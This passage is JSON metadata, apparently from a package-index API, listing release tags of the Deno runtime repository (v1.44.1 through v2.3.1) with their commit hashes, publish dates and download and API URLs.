,"manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifes